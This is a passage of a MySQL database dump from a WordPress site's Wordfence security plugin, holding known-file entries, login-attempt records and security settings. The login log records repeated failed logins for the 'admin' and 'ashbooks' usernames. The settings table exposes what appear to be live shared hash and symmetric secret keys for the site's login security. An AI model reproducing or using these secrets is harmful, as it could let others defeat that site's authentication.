c/Core32/ChaCha20.php'),(3487,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(3488,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(3489,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(3490,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(3491,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(3492,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(3493,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(3494,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(3495,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(3496,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(3497,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(3498,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(3499,'wp-includes/sodium_compat/src/Core32/Int32.php'),(3500,'wp-includes/sodium_compat/src/Core32/Int64.php'),(3501,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(3502,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(3503,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(3504,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(3505,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(3506,'wp-includes/sodium_compat/src/Core32/Util.php'),(3507,'wp-includes/sodium_compat/src/Core32/X25519.php'),(3508,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(3509,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(3510,'wp-includes/sodium_compat/src/Crypto.php'),(3511,'wp-includes/sodium_compat/src/Crypto32.php'),(3512,'wp-includes/sodium_compat/src/File.php'),(3513,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(3514,'wp-includes/sodium_compat/src/SodiumException.php'),(3515,'wp-includes/spl-autoload-compat.php'),(3516,'wp-includes/taxonomy.php'),(3517,'wp-includes/template-loader.php'),(3518,'wp-includes/template.php'),(3519,'wp-includes/theme-compat/comments.php'),(3520,'wp-includes/theme-compat/embed-404.php'),(3521,'wp-includes/theme-compat/embed-content.php'),(3522,'wp-includes/theme-compat/embed.php'),(3523,'wp-includes/theme-compat/footer-embed.php'),(3524,'wp-includes/theme-compat/footer.php'),(3525,'wp-includes/theme-compat/header-embed.php'),(3526,'wp-includes/theme-compat/header.php'),(3527,'wp-includes/theme-compat/sidebar.php'),(3528,'wp-includes/theme.php'),(3529,'wp-includes/update.php'),(3530,'wp-includes/user.php'),(3531,'wp-includes/vars.php'),(3532,'wp-includes/version.php'),(3533,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(3534,'wp-includes/widgets/class-wp-widget-archives.php'),(3535,'wp-includes/widgets/class-wp-widget-calendar.php'),(3536,'wp-includes/widgets/class-wp-widget-categories.php'),(3537,'wp-includes/widgets/class-wp-widget-custom-html.php'),(3538,'wp-includes/widgets/class-wp-widget-links.php'),(3539,'wp-includes/widgets/class-wp-widget-media-audio.php'),(3540,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(3541,'wp-includes/widgets/class-wp-widget-media-image.php'),(3542,'wp-includes/widgets/class-wp-widget-media-video.php'),(3543,'wp-includes/widgets/class-wp-widget-media.php'),(3544,'wp-includes/widgets/class-wp-widget-meta.php'),(3545,'wp-includes/widgets/class-wp-widget-pages.php'),(3546,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(3547,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(3548,'wp-includes/widgets/class-wp-widget-rss.php'),(3549,'wp-includes/widgets/class-wp-widget-search.php'),(3550,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(3551,'wp-includes/widgets/class-wp-widget-text.php'),(3552,'wp-includes/widgets.php'),(3553,'wp-includes/wlwmanifest.xml'),(3554,'wp-includes/wp-db.php'),(3555,'wp-includes/wp-diff.php'),(3556,'wp-links-opml.php'),(3557,'wp-load.php'),(3558,'wp-login.php'),(3559,'wp-mail.php'),(3560,'wp-settings.php'),(3561,'wp-signup.php'),(3562,'wp-trackback.php'),(3563,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
INSERT INTO `wp_wflocs` VALUES ('\0\0\0\0\0\0\0\0\0\0��gF�M',1629755547,0,'','','Bangladesh','BD',23.7017994,90.3741989);
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=78 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (1,2,1624356983.562660,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0'),(2,4,1624358170.218833,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0���/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(3,7,1624368094.544428,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(4,8,1624368155.184477,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(5,9,1624368215.579834,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(6,10,1624368279.625039,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(7,11,1624368341.542964,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(8,12,1624368399.369121,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(9,13,1624368460.583378,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(10,14,1624368521.071982,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(11,15,1624368582.303669,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(12,16,1624368643.213982,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(13,17,1624368704.732158,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(14,18,1624368765.291068,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(15,19,1624368828.498666,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(16,19,1624368828.514881,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(17,20,1624368886.548849,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(18,21,1624368950.135340,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(19,21,1624368950.165258,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(20,22,1624369011.148744,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(21,23,1624369070.137479,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(22,24,1624369131.813619,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L�+','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(23,27,1624370801.437651,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��#�AS','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(24,30,1624377279.971545,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��g5\\','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(25,31,1624384026.352649,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(26,32,1624384063.196359,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(27,33,1624384145.627144,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(28,34,1624384163.622284,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(29,35,1624384210.363200,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(30,36,1624384223.949929,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(31,37,1624384270.891032,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(32,38,1624384284.619519,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(33,39,1624384328.741726,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(34,60,1624384956.399923,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(35,61,1624385002.899485,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(36,62,1624385016.818215,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(37,63,1624385060.788194,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(38,64,1624385080.720921,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(39,65,1624385121.795945,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(40,66,1624385138.851962,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(41,67,1624385183.255182,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(42,68,1624385200.823944,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(43,69,1624385244.250420,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(44,76,1624451027.201560,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(45,84,1624484786.404878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(46,85,1624484786.987232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(47,86,1624484788.646292,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(48,87,1624484789.762332,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(49,88,1624484790.180373,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(50,89,1624484790.834737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(51,90,1624484791.866054,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(52,91,1624484798.157464,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(53,92,1624484799.030397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(54,93,1624484800.365347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(55,93,1624484800.433720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(56,94,1624484801.971328,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(57,95,1624484803.098762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(58,95,1624484803.249516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(59,96,1624484803.800669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(60,97,1624484804.795738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(61,98,1624484805.976555,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(62,99,1624484806.763324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(63,100,1624484807.646143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%9�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(64,442,1624533154.918859,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(65,444,1624583277.515456,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(66,445,1624583340.238176,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(67,446,1624583405.662473,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(68,505,1624587018.239187,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(69,506,1624587079.501688,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(70,507,1624587140.981966,1,'loginFailInvalidUsername','ashbooks',0,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(71,565,1624590770.444986,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(72,566,1624590799.766649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(73,567,1624590860.975124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(74,628,1624594521.218139,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(75,629,1624594584.837109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(76,630,1624594642.776599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_L2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),(77,1021,1629755546.789564,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�M','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624356962','yes'),('ntp-offset','0.99081659317017','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','c2f3cdef9eecbca3474cf39fbc68ff493a550942a8fbc9e2797d7ed423f73247','yes'),('shared-symmetric-secret','747e32d20380a3f19311d3c48b5c45bc25571ecc62976fe81c52ccd9e440e96f','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',0,'wfplugin_updates',502,1624533350,'<a href=\"https://ashbooks.co.uk/wp-admin/update-core.php\">An update is available for WordPress (v5.7.2)</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1626922013,'<a href=\"https://ashbooks.co.uk/wp-admin/admin.php?page=WordfenceScan\">14 issues found in most recent scan</a>','[]'),('site-EYAAAAA',0,'wfplugin_updates',502,1624875391,'<a href=\"https://ashbooks.co.uk/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-JQAAAAA',1,'wfplugin_updates',502,1629713825,'<a href=\"https://ashbooks.co.uk/wp-admin/update-core.php\">Updates are available for WordPress (v5.8), 4 plugins, and 4 themes</a>','[]'),('site-P4AAAAA',1,'wfplugin_scan',502,1629713828,'<a href=\"https://ashbooks.co.uk/wp-admin/admin.php?page=WordfenceScan\">18 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
